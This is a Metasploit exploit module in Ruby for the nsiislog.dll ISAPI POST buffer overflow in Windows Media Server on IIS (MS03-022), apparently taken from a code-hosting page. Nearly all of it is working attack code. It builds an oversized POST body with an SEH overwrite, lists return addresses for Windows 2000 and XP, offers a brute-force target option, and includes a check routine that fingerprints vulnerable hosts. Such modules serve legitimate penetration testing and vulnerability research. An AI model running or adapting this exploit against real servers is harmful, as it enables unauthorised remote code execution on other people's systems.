metasploit-framework/modules/exploits/windows/isapi/nsiislog_post.rb

104 lines
2.5 KiB
Ruby
Raw Normal View History

require 'msf/core'
module Msf
class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
include Exploit::Remote::BruteTargets
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'IIS nsiislog.dll ISAPI POST Overflow',
'Description' => %q{
This exploits a buffer overflow found in the nsiislog.dll
ISAPI filter that comes with Windows Media Server. This
module will also work against the 'patched' MS03-019
version. This vulnerability was addressed by MS03-022.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '4535'],
[ 'MSB', 'MS03-022'],
[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
[ 'MIL', '30'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['Brute Force', { }],
['Windows 2000 -MS03-019', { 'Rets' => [ 9769, 0x40f01333 ] }],
['Windows 2000 +MS03-019', { 'Rets' => [ 13869, 0x40f01353 ] }],
['Windows XP -MS03-019', { 'Rets' => [ 9773, 0x40f011e0 ] }],
],
'DisclosureDate' => 'Jun 25 2003',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
], self.class)
end
def check
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
if (res and res.body =~ /NetShow ISAPI/)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit_target(target)
c = connect
buf = ''
%w{
date time c-dns cs-uri-stem c-starttime
x-duration c-rate c-status c-playerid c-playerversion
c-playerlanguage cs(User-Agent) cs(Referer) c-hostexe
}.each do |field|
buf << field + '=' + 'BOOM&'
end
pat = 'O' * 65535
seh = generate_seh_payload(target['Rets'][1])
pat[ target['Rets'][0] - 4, seh.length] = seh
buf << pat
req = c.request({
'uri' => datastore['URL'],
'method' => 'POST',
'user-agent' => 'NSPlayer/2.0',
'content-type' => 'application/x-www-form-urlencoded',
'data' => buf,
})
print_status("Sending request...")
c.send_request(req, 0)
handler
disconnect
end
end
end